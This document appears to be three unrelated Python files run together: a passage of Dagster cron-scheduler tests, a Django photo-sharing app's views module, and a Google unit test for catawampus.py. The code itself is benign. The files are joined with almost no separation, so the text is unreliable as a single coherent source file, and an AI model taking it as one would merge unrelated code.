    """Minimal one-solid pipeline used as the target of every schedule in
    these tests."""
    @lambda_solid
    def return_hello():
        return "Hello"

    return return_hello()
# Schedule definitions under test: a daily schedule, an every-minute
# schedule, and an every-minute schedule that relies on default run config.
schedules_dict = {
    "no_config_pipeline_daily_schedule": ScheduleDefinition(
        name="no_config_pipeline_daily_schedule",
        cron_schedule="0 0 * * *",
        pipeline_name="no_config_pipeline",
        run_config={"intermediate_storage": {"filesystem": None}},
    ),
    "no_config_pipeline_every_min_schedule": ScheduleDefinition(
        name="no_config_pipeline_every_min_schedule",
        cron_schedule="* * * * *",
        pipeline_name="no_config_pipeline",
        run_config={"intermediate_storage": {"filesystem": None}},
    ),
    "default_config_pipeline_every_min_schedule": ScheduleDefinition(
        name="default_config_pipeline_every_min_schedule",
        cron_schedule="* * * * *",
        pipeline_name="no_config_pipeline",
    ),
}
def define_schedules():
    """Return every test schedule definition as a list."""
    return [schedule for schedule in schedules_dict.values()]
@repository
def test_repository():
    """Repository containing the pipeline and schedules; with
    DAGSTER_TEST_SMALL_REPO set it omits the default-config schedule so
    reconciliation against a shrunken repo can be exercised."""
    if os.getenv("DAGSTER_TEST_SMALL_REPO"):
        return [no_config_pipeline] + list(
            filter(
                lambda x: not x.name == "default_config_pipeline_every_min_schedule",
                define_schedules(),
            )
        )
    return [no_config_pipeline] + define_schedules()
@contextmanager
def get_test_external_repo():
    """Yield an ExternalRepository for `test_repository` served from a
    managed gRPC python-environment location."""
    with RepositoryLocationHandle.create_from_repository_location_origin(
        ManagedGrpcPythonEnvRepositoryLocationOrigin(
            loadable_target_origin=LoadableTargetOrigin(
                executable_path=sys.executable, python_file=__file__, attribute="test_repository",
            ),
            location_name="test_location",
        )
    ) as handle:
        yield RepositoryLocation.from_handle(handle).get_repository("test_repository")
@contextmanager
def get_smaller_external_repo():
    """Yield the external repo loaded with DAGSTER_TEST_SMALL_REPO set, so
    one schedule is missing (see test_repository)."""
    with environ({"DAGSTER_TEST_SMALL_REPO": "1"}):
        with get_test_external_repo() as repo:
            yield repo
def get_cron_jobs():
    """Return the current user's crontab as a list of non-empty lines."""
    raw = subprocess.check_output(["crontab", "-l"]).decode("utf-8")
    return [line for line in raw.strip().split("\n") if line]
def define_scheduler_instance(tempdir):
    """Build an ephemeral DagsterInstance rooted at *tempdir* that uses the
    SystemCronScheduler with in-memory run/event storage and SQLite
    schedule storage."""
    return DagsterInstance(
        instance_type=InstanceType.EPHEMERAL,
        local_artifact_storage=LocalArtifactStorage(tempdir),
        run_storage=InMemoryRunStorage(),
        event_storage=InMemoryEventLogStorage(),
        compute_log_manager=NoOpComputeLogManager(),
        schedule_storage=SqliteScheduleStorage.from_local(os.path.join(tempdir, "schedules")),
        scheduler=SystemCronScheduler(),
        run_coordinator=DefaultRunCoordinator(),
        run_launcher=SyncInMemoryRunLauncher(),
    )
def test_init(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """Reconciling scheduler state persists schedule state to disk."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repository:
            # Initialize scheduler
            instance.reconcile_scheduler_state(external_repository)
            # Check schedules are saved to disk
            assert "schedules" in os.listdir(tempdir)
            assert instance.all_stored_job_state(job_type=JobType.SCHEDULE)
@freeze_time("2019-02-27")
def test_re_init(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """Starting a schedule records the (frozen) start timestamp, and the
    stored state matches what start returned."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            now = get_current_datetime_in_utc()
            # Start schedule
            schedule_state = instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            assert (
                schedule_state.job_specific_data.start_timestamp
                == get_timestamp_from_utc_datetime(now)
            )
            # Check schedules are saved to disk
            assert "schedules" in os.listdir(tempdir)
            schedule_states = instance.all_stored_job_state(job_type=JobType.SCHEDULE)
            for state in schedule_states:
                if state.name == "no_config_pipeline_every_min_schedule":
                    assert state == schedule_state
@pytest.mark.parametrize("do_initial_reconcile", [True, False])
def test_start_and_stop_schedule(
    restore_cron_tab, do_initial_reconcile,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Starting a schedule writes its bash script; stopping removes it —
    with and without a prior reconcile."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            if do_initial_reconcile:
                instance.reconcile_scheduler_state(external_repo)
            schedule = external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            schedule_origin_id = schedule.get_external_origin_id()
            instance.start_schedule_and_update_storage_state(schedule)
            assert "schedules" in os.listdir(tempdir)
            assert "{}.sh".format(schedule_origin_id) in os.listdir(
                os.path.join(tempdir, "schedules", "scripts")
            )
            instance.stop_schedule_and_update_storage_state(schedule_origin_id)
            assert "{}.sh".format(schedule_origin_id) not in os.listdir(
                os.path.join(tempdir, "schedules", "scripts")
            )
def test_start_non_existent_schedule(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Operating on an unknown schedule origin id raises
    DagsterScheduleDoesNotExist.

    NOTE(review): despite the name, this test calls *stop*, not start —
    confirm whether the name or the call is what's intended."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with pytest.raises(DagsterScheduleDoesNotExist):
            instance.stop_schedule_and_update_storage_state("asdf")
@pytest.mark.parametrize("do_initial_reconcile", [True, False])
def test_start_schedule_cron_job(
    do_initial_reconcile, restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Starting all three schedules writes three crontab entries whose cron
    expression, script path and log file all check out."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            if do_initial_reconcile:
                instance.reconcile_scheduler_state(external_repo)
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
            )
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
            )
            # Inspect the cron tab
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 3
            external_schedules_dict = {
                external_repo.get_external_schedule(name).get_external_origin_id(): schedule_def
                for name, schedule_def in schedules_dict.items()
            }
            for cron_job in cron_jobs:
                # Each entry looks like: "<cron> <script> > <log> 2>&1 # dagster-schedule: <origin_id>"
                match = re.findall(r"^(.*?) (/.*) > (.*) 2>&1 # dagster-schedule: (.*)", cron_job)
                cron_schedule, command, log_file, schedule_origin_id = match[0]
                schedule_def = external_schedules_dict[schedule_origin_id]
                # Check cron schedule matches
                if schedule_def.cron_schedule == "0 0 * * *":
                    assert cron_schedule == "@daily"
                else:
                    assert cron_schedule == schedule_def.cron_schedule
                # Check bash file exists
                assert os.path.isfile(command)
                # Check log file is correct
                assert log_file.endswith("scheduler.log")
def test_remove_schedule_def(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Reconciling against a repo with one fewer schedule drops the stored
    state for the removed schedule."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            instance.reconcile_scheduler_state(external_repo)
            assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
            with get_smaller_external_repo() as smaller_repo:
                instance.reconcile_scheduler_state(smaller_repo)
                assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 2
def test_add_schedule_def(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """Reconciling against a repo with an added schedule stores its state
    without starting it; the new schedule can then be started normally."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_smaller_external_repo() as external_repo:
            # Start all schedule and verify cron tab, schedule storage, and errors
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
            )
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 2
            assert len(get_cron_jobs()) == 2
            assert len(instance.scheduler_debug_info().errors) == 0
        with get_test_external_repo() as external_repo:
            # Reconcile with an additional schedule added
            instance.reconcile_scheduler_state(external_repo)
            assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
            assert len(get_cron_jobs()) == 2
            assert len(instance.scheduler_debug_info().errors) == 0
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
            )
            assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
            assert len(get_cron_jobs()) == 3
            assert len(instance.scheduler_debug_info().errors) == 0
def test_start_and_stop_schedule_cron_tab(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Exercise the crontab through start / double-start / stop /
    double-stop / restart cycles, checking the entry count after each step
    and that reconciliation never changes a settled state."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            # Start schedule
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 1
            # Try starting it again
            with pytest.raises(DagsterSchedulerError):
                instance.start_schedule_and_update_storage_state(
                    external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
                )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 1
            # Start another schedule
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 2
            # Stop second schedule
            instance.stop_schedule_and_update_storage_state(
                external_repo.get_external_schedule(
                    "no_config_pipeline_daily_schedule"
                ).get_external_origin_id()
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 1
            # Try stopping second schedule again (stop is idempotent)
            instance.stop_schedule_and_update_storage_state(
                external_repo.get_external_schedule(
                    "no_config_pipeline_daily_schedule"
                ).get_external_origin_id()
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 1
            # Start second schedule
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 2
            # Reconcile schedule state, should be in the same state
            instance.reconcile_scheduler_state(external_repo)
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 2
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 3
            # Reconcile schedule state, should be in the same state
            instance.reconcile_scheduler_state(external_repo)
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 3
            # Stop all schedules
            instance.stop_schedule_and_update_storage_state(
                external_repo.get_external_schedule(
                    "no_config_pipeline_every_min_schedule"
                ).get_external_origin_id()
            )
            instance.stop_schedule_and_update_storage_state(
                external_repo.get_external_schedule(
                    "no_config_pipeline_daily_schedule"
                ).get_external_origin_id()
            )
            instance.stop_schedule_and_update_storage_state(
                external_repo.get_external_schedule(
                    "default_config_pipeline_every_min_schedule"
                ).get_external_origin_id()
            )
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 0
            # Reconcile schedule state, should be in the same state
            instance.reconcile_scheduler_state(external_repo)
            cron_jobs = get_cron_jobs()
            assert len(cron_jobs) == 0
def test_script_execution(
    restore_cron_tab, unset_dagster_home
):  # pylint:disable=unused-argument,redefined-outer-name
    """Running the generated bash script by hand launches the pipeline run
    synchronously and it succeeds."""
    with TemporaryDirectory() as tempdir:
        os.environ["DAGSTER_HOME"] = tempdir
        config = {
            "scheduler": {"module": "dagster_cron", "class": "SystemCronScheduler", "config": {}},
            # This needs to synchronously execute to completion when
            # the generated bash script is invoked
            "run_launcher": {
                "module": "dagster.core.launcher.sync_in_memory_run_launcher",
                "class": "SyncInMemoryRunLauncher",
            },
        }
        with open(os.path.join(tempdir, "dagster.yaml"), "w+") as f:
            f.write(yaml.dump(config))
        instance = DagsterInstance.get()
        with get_test_external_repo() as external_repo:
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            schedule_origin_id = external_repo.get_external_schedule(
                "no_config_pipeline_every_min_schedule"
            ).get_external_origin_id()
            script = instance.scheduler._get_bash_script_file_path(  # pylint: disable=protected-access
                instance, schedule_origin_id
            )
            subprocess.check_output([script], shell=True, env={"DAGSTER_HOME": tempdir})
            runs = instance.get_runs()
            assert len(runs) == 1
            assert runs[0].status == PipelineRunStatus.SUCCESS
def test_start_schedule_fails(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """If writing the cron job raises, the exception propagates and the
    schedule is left STOPPED."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            def raises(*args, **kwargs):
                raise Exception("Patch")

            instance._scheduler._start_cron_job = raises  # pylint: disable=protected-access
            with pytest.raises(Exception, match="Patch"):
                instance.start_schedule_and_update_storage_state(
                    external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
                )
            schedule = instance.get_job_state(
                external_repo.get_external_schedule(
                    "no_config_pipeline_every_min_schedule"
                ).get_external_origin_id()
            )
            assert schedule.status == JobStatus.STOPPED
def test_start_schedule_unsuccessful(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """If the cron write silently does nothing, start raises a
    DagsterSchedulerError explaining the schedule is not running."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            def do_nothing(*_):
                pass

            instance._scheduler._start_cron_job = do_nothing  # pylint: disable=protected-access
            # End schedule
            with pytest.raises(
                DagsterSchedulerError,
                match="Attempted to write cron job for schedule no_config_pipeline_every_min_schedule, "
                "but failed. The scheduler is not running no_config_pipeline_every_min_schedule.",
            ):
                instance.start_schedule_and_update_storage_state(
                    external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
                )
def test_start_schedule_manual_delete_debug(
    restore_cron_tab, snapshot  # pylint:disable=unused-argument,redefined-outer-name
):
    """Manually deleting a running schedule's cron entry surfaces a debug
    error, which reconciliation repairs."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            # Manually delete the schedule from the crontab
            instance.scheduler._end_cron_job(  # pylint: disable=protected-access
                instance,
                external_repo.get_external_schedule(
                    "no_config_pipeline_every_min_schedule"
                ).get_external_origin_id(),
            )
            # Check debug command
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 1
            # Reconcile should fix error
            instance.reconcile_scheduler_state(external_repo)
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 0
def test_start_schedule_manual_add_debug(
    restore_cron_tab, snapshot  # pylint:disable=unused-argument,redefined-outer-name
):
    """Manually adding a cron entry for a schedule that is not running
    surfaces a debug error, which reconciliation repairs."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            # Initialize scheduler
            instance.reconcile_scheduler_state(external_repo)
            # Manually add the schedule from to the crontab
            instance.scheduler._start_cron_job(  # pylint: disable=protected-access
                instance,
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule"),
            )
            # Check debug command
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 1
            # Reconcile should fix error
            instance.reconcile_scheduler_state(external_repo)
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 0
def test_start_schedule_manual_duplicate_schedules_add_debug(
    restore_cron_tab, snapshot  # pylint:disable=unused-argument,redefined-outer-name
):
    """Duplicate cron entries for one schedule surface a single debug
    error, which reconciliation repairs."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            external_schedule = external_repo.get_external_schedule(
                "no_config_pipeline_every_min_schedule"
            )
            instance.start_schedule_and_update_storage_state(external_schedule)
            # Manually add extra cron tabs
            instance.scheduler._start_cron_job(  # pylint: disable=protected-access
                instance, external_schedule,
            )
            instance.scheduler._start_cron_job(  # pylint: disable=protected-access
                instance, external_schedule,
            )
            # Check debug command
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 1
            # Reconcile should fix error
            instance.reconcile_scheduler_state(external_repo)
            debug_info = instance.scheduler_debug_info()
            assert len(debug_info.errors) == 0
def test_stop_schedule_fails(
    restore_cron_tab,  # pylint:disable=unused-argument,redefined-outer-name
):
    """If removing the cron job raises, the exception propagates and the
    schedule stays RUNNING."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            external_schedule = external_repo.get_external_schedule(
                "no_config_pipeline_every_min_schedule"
            )
            schedule_origin_id = external_schedule.get_external_origin_id()

            def raises(*args, **kwargs):
                raise Exception("Patch")

            instance._scheduler._end_cron_job = raises  # pylint: disable=protected-access
            instance.start_schedule_and_update_storage_state(external_schedule)
            assert "schedules" in os.listdir(tempdir)
            assert "{}.sh".format(schedule_origin_id) in os.listdir(
                os.path.join(tempdir, "schedules", "scripts")
            )
            # End schedule
            with pytest.raises(Exception, match="Patch"):
                instance.stop_schedule_and_update_storage_state(schedule_origin_id)
            schedule = instance.get_job_state(schedule_origin_id)
            assert schedule.status == JobStatus.RUNNING
def test_stop_schedule_unsuccessful(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """If the cron removal silently does nothing, stop raises a
    DagsterSchedulerError reporting the job still running."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            def do_nothing(*_):
                pass

            instance._scheduler._end_cron_job = do_nothing  # pylint: disable=protected-access
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            # End schedule
            with pytest.raises(
                DagsterSchedulerError,
                match="Attempted to remove existing cron job for schedule "
                "no_config_pipeline_every_min_schedule, but failed. There are still 1 jobs running for "
                "the schedule.",
            ):
                instance.stop_schedule_and_update_storage_state(
                    external_repo.get_external_schedule(
                        "no_config_pipeline_every_min_schedule"
                    ).get_external_origin_id()
                )
def test_wipe(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """wipe_all_schedules clears every stored schedule job state."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            # Start one schedule so there is state to wipe.
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )
            instance.wipe_all_schedules()
            # Storage must be empty afterwards.
            assert instance.all_stored_job_state(job_type=JobType.SCHEDULE) == []
def test_log_directory(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """The per-schedule log path is derived from the schedule origin id."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            external_schedule = external_repo.get_external_schedule(
                "no_config_pipeline_every_min_schedule"
            )
            origin_id = external_schedule.get_external_origin_id()

            schedule_log_path = instance.logs_path_for_schedule(origin_id)
            expected_suffix = "/schedules/logs/{schedule_origin_id}/scheduler.log".format(
                schedule_origin_id=origin_id
            )
            assert schedule_log_path.endswith(expected_suffix)

            # Start then wipe; the job-state storage must come back empty.
            instance.start_schedule_and_update_storage_state(external_schedule)
            instance.wipe_all_schedules()
            assert instance.all_stored_job_state(job_type=JobType.SCHEDULE) == []
def test_reconcile_failure(restore_cron_tab):  # pylint:disable=unused-argument,redefined-outer-name
    """Reconcile aggregates one error per schedule when start/stop fail."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            instance.reconcile_scheduler_state(external_repo)
            instance.start_schedule_and_update_storage_state(
                external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
            )

            def _failed_start_job(*_):
                raise DagsterSchedulerError("Failed to start")

            def _failed_end_job(*_):
                raise DagsterSchedulerError("Failed to stop")

            # Force every start/stop attempt during reconcile to fail.
            instance._scheduler.start_schedule = _failed_start_job  # pylint: disable=protected-access
            instance._scheduler.stop_schedule = _failed_end_job  # pylint: disable=protected-access

            with pytest.raises(
                DagsterScheduleReconciliationError,
                match="Error 1: Failed to stop\n Error 2: Failed to stop\n Error 3: Failed to stop",
            ):
                instance.reconcile_scheduler_state(external_repo)
@freeze_time("2019-02-27")
def test_reconcile_schedule_without_start_time():
    """Reconciling a legacy RUNNING state lacking a start time stamps 'now'."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            external_schedule = external_repo.get_external_schedule(
                "no_config_pipeline_daily_schedule"
            )

            # Legacy state: marked RUNNING but with no start timestamp stored.
            legacy_schedule_state = JobState(
                external_schedule.get_external_origin(),
                JobType.SCHEDULE,
                JobStatus.RUNNING,
                ScheduleJobData(external_schedule.cron_schedule, None),
            )
            instance.add_job_state(legacy_schedule_state)

            instance.reconcile_scheduler_state(external_repository=external_repo)

            reconciled = instance.get_job_state(
                external_schedule.get_external_origin_id()
            )
            assert reconciled.status == JobStatus.RUNNING
            # freeze_time pins "now", so the backfilled timestamp is exact.
            assert (
                reconciled.job_specific_data.start_timestamp
                == get_timestamp_from_utc_datetime(get_current_datetime_in_utc())
            )
def test_reconcile_failure_when_deleting_schedule_def(
    restore_cron_tab,
):  # pylint:disable=unused-argument,redefined-outer-name
    """Errors raised while deleting removed schedules surface from reconcile."""
    with TemporaryDirectory() as tempdir:
        instance = define_scheduler_instance(tempdir)
        with get_test_external_repo() as external_repo:
            instance.reconcile_scheduler_state(external_repo)
            assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3

            def _failed_end_job(*_):
                raise DagsterSchedulerError("Failed to stop")

            # Deleting a schedule that vanished from the repo will now fail.
            instance._scheduler.stop_schedule_and_delete_from_storage = (  # pylint: disable=protected-access
                _failed_end_job
            )

            with pytest.raises(
                DagsterScheduleReconciliationError, match="Error 1: Failed to stop",
            ):
                with get_smaller_external_repo() as smaller_repo:
                    instance.reconcile_scheduler_state(smaller_repo)
|
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login, authenticate, logout
from django.contrib.sites.shortcuts import get_current_site
from django.utils.http import urlsafe_base64_encode #encypt token to base64
from django.utils.encoding import force_bytes, force_text
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from .models import Image, Profile, Comment, Likes, Followers
from .forms import FormSignUp,FormLogin,ProfileForm,FormImage, CommentForm
from django.conf import settings
import os
# Create your views here.
def index(request):
    """Render the home feed with every uploaded image."""
    all_images = Image.get_images()
    return render(request, 'home.html', {"images": all_images})
def signingup(request):
    """Register a new user account.

    New accounts are created inactive; the e-mail activation flow is not
    wired up yet (kept below as commented-out reference).
    """
    if request.method == 'POST':
        form = FormSignUp(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            user.is_active = False  # inactive until (future) e-mail activation
            user.save()
            current = get_current_site(request)  # kept for the activation flow below
            # TODO: re-enable the activation e-mail:
            # subject = 'Activate your iNsTa'
            # message = render_to_string('email/email.html', {
            #     'user': user,
            #     'domain': current.domain,
            #     'uid': urlsafe_base64_encode(force_bytes(user.pk)),
            #     'token': account_activation_token.make_token(user)
            # })
            # user.email_user(subject, message)
            # Fix: the view previously fell through and re-rendered the bound
            # form after a successful signup; redirect instead (PRG pattern).
            return redirect(index)
    else:
        form = FormSignUp()
    return render(request, 'django_registration/registration_form.html', {'form': form})
@login_required(login_url='/login')
def profile(request):
    """Create (or submit) the signed-in user's profile.

    GET renders an empty ProfileForm; a valid POST saves the profile bound
    to the current user and redirects to the profile display page.
    """
    current_user = request.user
    if request.method == "POST":
        form = ProfileForm(request.POST, request.FILES)
        if form.is_valid():
            profile = form.save(commit=False)
            profile.user = current_user
            profile.save()
            # Fix: updatedprofile requires a `username` URL argument;
            # redirecting without it raised NoReverseMatch.
            return redirect(updatedprofile, username=current_user.username)
    else:
        form = ProfileForm()
    return render(request, 'profile.html', {"form": form})
@login_required(login_url='/login')
def updatedprofile(request, username):
    """Display the profile page for the signed-in user.

    NOTE(review): the `username` URL argument is currently ignored; the
    profile shown is always looked up by the requester's own user id —
    confirm whether per-username lookup is intended.
    """
    viewer = request.user
    # assumes Profile pk mirrors the User pk — TODO confirm against models
    profile = Profile.objects.filter(id=viewer.id).all()
    return render(request, 'viewprofile.html', {"profile": profile})
@login_required(login_url='/login')
def uploadimage(request):
    """Handle the image-upload form and publish the image."""
    if request.method == 'POST':
        form = FormImage(request.POST, request.FILES)
        if form.is_valid():
            posted_image = form.save(commit=False)
            # NOTE(review): the image is saved without an owner; the
            # profile assignment is still commented out upstream — confirm.
            posted_image.save()
            return redirect(index)
    else:
        form = FormImage()
    return render(request, 'uploadimage.html', {"form": form})
def search(request):
    """Search profiles by username.

    Fix: when no `user` query parameter was supplied the view returned
    None, which Django turns into a server error; it now falls back to an
    empty result page.
    """
    if 'user' in request.GET and request.GET['user']:
        search_user = request.GET.get('user')
        username_searched = Profile.search_by_profile(search_user)
        message = f'{search_user}'
        return render(request, 'search.html', {"users": username_searched, "message": message})
    return render(request, 'search.html', {"users": [], "message": ""})
def specific(request, img_id):
    """Show the detail page of a single image with its comments and likes.

    Fix: `likes` was passed in the template context but never defined (its
    computation was commented out), raising NameError on every request.
    """
    image = Image.objects.get(pk=img_id)
    # Count likes via the Likes model (created with user=/image= elsewhere).
    likes = Likes.objects.filter(image=image).count()
    comments = Comment.objects.filter(image_id=img_id).all()
    return render(request, 'singleimage.html', {"image": image, "comments": comments, "likes": likes})
def comment(request, id):
    """Render the comment form and attach a submitted comment to the image."""
    image = Image.objects.get(pk=id)
    if request.method == 'POST':
        form = CommentForm(request.POST)
        if form.is_valid():
            new_comment = form.save(commit=False)
            new_comment.user_id = request.user
            new_comment.image_id = image
            new_comment.save_comment()
            return redirect(index)
    else:
        form = CommentForm()
    return render(request, 'comment.html', {"form": form, "image": image})
def likes(request, img_id):
    """Record a like by the current user on the given image, then go home."""
    current_image = Image.objects.get(pk=img_id)
    Likes.objects.create(user=request.user, image=current_image)
    return redirect(index)
def login(request):
    """Display and process the login form.

    Fixes:
    - This view shadows django.contrib.auth.login, so the old call
      ``login(request, user)`` recursed into the view itself instead of
      creating a session; an aliased import is used instead.
    - ``authenticate(username, password)`` passed credentials positionally,
      so authentication never matched; keyword arguments are required.
    - ``user`` is None on failed authentication; the old code crashed on
      ``user.is_active``.
    """
    from django.contrib.auth import login as auth_login

    if request.method == 'POST':
        form = FormLogin(request.POST)
        if form.is_valid():
            username = form.cleaned_data['Username']
            password = form.cleaned_data['Password']
            user = authenticate(request, username=username, password=password)
            if user is not None and user.is_active:
                auth_login(request, user)
                print("You have logged into your account")
                return redirect(index)
            else:
                return HttpResponse("Your account is inactive")
    else:
        form = FormLogin()
    return render(request, 'registration/login.html', {"form": form})
def logout_view(request):
    """Terminate the current session and return to the landing page."""
    logout(request)
    return redirect(index)
<filename>dm/catawampus_test.py
#!/usr/bin/python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# unittest requires method names starting in 'test'
# pylint:disable=invalid-name
"""Unit tests for catawampus.py implementation."""
__author__ = '<EMAIL> (<NAME>)'
import google3
from tr.wvtest import unittest
import dm.periodic_statistics
import tr.api
import tr.core
import tr.experiment
import tr.handle
import catawampus
class CatawampusTest(unittest.TestCase):
    """Tests for catawampus.py."""

    def _make_dm(self):
        """Return a fresh CatawampusDm wired to a new experiment handle."""
        root = tr.core.Exporter()
        handle = tr.experiment.ExperimentHandle(root)
        return catawampus.CatawampusDm(handle)

    def testValidateExports(self):
        tr.handle.ValidateExports(self._make_dm())

    def testRuntimeEnv(self):
        self.assertTrue(self._make_dm().RuntimeEnvInfo)

    def testProfiler(self):
        cata = self._make_dm()
        cata.Profiler.Enable = True
        # Profiler is running; give it something to sample.
        acc = 0
        for i in range(1000):
            acc += i
        cata.Profiler.Enable = False
        # Content is too fragile to assert on; just require *something*.
        self.assertTrue(cata.Profiler.Result)

    def testExpensiveStuffEnable(self):
        cata = self._make_dm()
        self.assertFalse(tr.api.ExpensiveNotificationsEnable)
        self.assertFalse(dm.periodic_statistics.ExpensiveStatsEnable)
        cata.ExpensiveStuff.Enable = True
        self.assertTrue(tr.api.ExpensiveNotificationsEnable)
        self.assertTrue(dm.periodic_statistics.ExpensiveStatsEnable)
        cata.ExpensiveStuff.Enable = False
        self.assertFalse(tr.api.ExpensiveNotificationsEnable)
        self.assertFalse(dm.periodic_statistics.ExpensiveStatsEnable)

    def testExpensiveStuff(self):
        cata = self._make_dm()
        for i in range(1, 100):
            name = 'foo%d' % i
            tr.api.ExpensiveNotifications[name] = 100 - i
            dm.periodic_statistics.ExpensiveStats[name] = 100 - i
